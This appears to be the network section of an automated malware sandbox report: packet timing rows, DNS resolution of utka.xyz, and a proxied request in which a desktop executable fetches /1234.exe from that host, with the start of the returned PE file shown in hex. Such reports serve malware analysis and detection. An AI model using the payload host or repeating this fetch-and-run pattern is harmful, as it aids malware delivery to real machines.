Oct 9, 2024 16:16:08.542412996 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.542452097 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.542463064 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.542505980 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.542629004 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.542682886 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.542754889 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.542805910 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.542879105 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.542944908 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.542948961 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.542959929 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.543258905 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.543680906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.543720007 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.543739080 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.543744087 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.543761969 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.543838024 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.543869972 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.543917894 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.543972969 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.544024944 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.544245005 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.544394016 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.544416904 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.544423103 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.544444084 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.544625998 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.544646978 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.544693947 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.544753075 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.544795990 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.571954966 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.572045088 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.572057962 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.572165966 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.572293043 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.572329998 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.572356939 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.572365046 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.572379112 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.572412968 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.612432957 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.612524033 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.612565041 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.612572908 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.612601042 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.612623930 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.614195108 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.614269018 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.614341021 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.614409924 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.629194975 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.629256010 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.629271984 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.629297972 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.629318953 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.629323959 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.629348040 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.629362106 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.629394054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.629399061 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.629407883 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.629425049 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.629462957 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.629554987 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.629576921 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.629581928 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.629597902 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.629621029 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.629653931 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.629661083 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.629695892 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.629920959 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.629976034 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.630022049 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.630073071 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.630076885 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.630086899 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.630116940 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.630136013 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.630175114 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.630179882 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.630306005 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.630518913 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.630569935 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.630688906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.630738020 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.630760908 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.630764961 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.630774021 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.630781889 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.630867958 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.630872011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.630913973 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.631445885 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.631493092 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.631500006 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.631546021 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.631556988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.631633043 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.631637096 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.631644964 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.631686926 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.631688118 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.632194996 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.632266998 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.632287979 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.632292986 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.632308006 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.632342100 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.632354021 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.632358074 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.632373095 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.632394075 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.632430077 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.632435083 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.632467031 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.659142971 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.659240007 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.659251928 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.659259081 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.659306049 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.659306049 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.659801960 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.659868956 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.659987926 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.660039902 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.700754881 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.700826883 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.700898886 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.700911999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.700932026 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.700977087 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.701888084 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.702030897 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.702061892 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.702105045 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.702109098 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.702119112 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.702150106 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.717124939 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.717183113 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.717216015 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.717248917 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.717271090 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.717282057 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.717319012 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.717327118 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.717331886 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.717367887 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.717386961 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.717391014 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.717427969 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.717446089 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.717451096 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.717487097 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.717492104 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.717518091 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.717546940 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.717566013 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.717571020 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.717601061 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.717606068 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.717609882 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.717645884 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.717663050 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.717735052 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.717767000 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.717770100 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.717780113 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.717814922 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.717819929 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.717865944 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.717911959 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.717916012 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.718766928 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.718805075 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.718823910 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.718832016 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.718841076 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.718893051 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.718909979 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.718924999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.718944073 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.718962908 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.718990088 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.719007015 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.719012976 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.719046116 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.719047070 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.719054937 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.719080925 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.719088078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.719129086 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.719130993 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.719142914 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.719178915 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.719182014 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.719182014 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.719191074 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.719213963 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.719214916 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.719249964 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.719261885 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.719265938 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.719285011 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.719340086 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.719402075 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.719405890 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.719440937 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.719487906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.719532967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.719554901 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.719559908 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.719575882 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.719785929 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.720561981 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.720618963 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.720685005 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.720766068 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.720768929 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.720774889 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.720828056 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.720859051 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.720910072 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.746983051 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.747028112 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.747046947 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.747060061 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.747081995 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.747190952 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.747658014 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.747769117 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.747796059 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.747800112 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.747828007 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.748675108 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.791949987 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.792031050 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.792046070 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.792097092 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.792249918 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.792452097 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.792470932 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.792475939 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.792515993 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.792515993 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.810355902 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.810444117 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.810463905 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.810478926 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.810503006 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.810550928 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.810570955 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.810575008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.810591936 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.810607910 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.810688972 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.810708046 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.810713053 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.810729980 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.810925961 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.810961962 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.810976982 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.810981989 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.810998917 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.811017990 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.811182022 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:08.811187983 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:08.811233044 CEST	49723	443	192.168.2.10	84.32.84.109

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 9, 2024 16:15:56.761091948 CEST	192.168.2.10	1.1.1.1	0xefc1	Standard query (0)	utka.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 9, 2024 16:15:52.873512030 CEST	1.1.1.1	192.168.2.10	0xacd1	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 9, 2024 16:15:52.873512030 CEST	1.1.1.1	192.168.2.10	0xacd1	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:15:56.808074951 CEST	1.1.1.1	192.168.2.10	0xefc1	No error (0)	utka.xyz		84.32.84.109	A (IP address)	IN (0x0001)	false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49723	84.32.84.109	443	8104	C:\Users\user\Desktop\zufmUwylvo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-09 14:15:57 UTC	66	OUT	GET /1234.exe HTTP/1.1 Host: utka.xyz Connection: Keep-Alive
2024-10-09 14:15:57 UTC	535	IN	HTTP/1.1 200 OK Server: hcdn Date: Wed, 09 Oct 2024 14:15:57 GMT Content-Type: application/x-executable Content-Length: 20970496 Connection: close last-modified: Mon, 30 Sep 2024 19:13:56 GMT etag: "13ffc00-66faf874-6cb4d912d515bc0b;;;" platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests x-turbo-charged-by: LiteSpeed alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 66eece043c06857d23dd7f5e1328c6cd-bos-edge4 x-hcdn-cache-status: MISS x-hcdn-upstream-rt: 0.021 Accept-Ranges: bytes
2024-10-09 14:15:57 UTC	834	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 68 72 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0e 00 99 f4 fa 66 00 00 00 00 00 00 00 00 f0 00 2f 02 0b 02 02 26 00 ae 01 00 00 5c 5b 00 00 26 00 00 52 0a 5d 01 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 40 02 00 04 00 00 52 85 40 01 02 00 20 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 Data Ascii: MZ@hr!L!This program cannot be run in DOS mode.$PEdf/&\[&R]@@R@
2024-10-09 14:15:57 UTC	1369	IN	Data Raw: 4b 69 00 00 00 00 58 00 00 00 00 e0 00 01 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 2e 3e 66 00 00 00 00 a8 ed 3f 01 00 f0 00 01 00 ee 3f 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 c0 06 00 00 00 e0 40 02 00 08 00 00 00 f4 3f 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 b7 27 01 00 00 00 00 00 00 00 00 00 00 00 00 dc 43 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: KiX@..>f??`h.rsrc@?@@'C
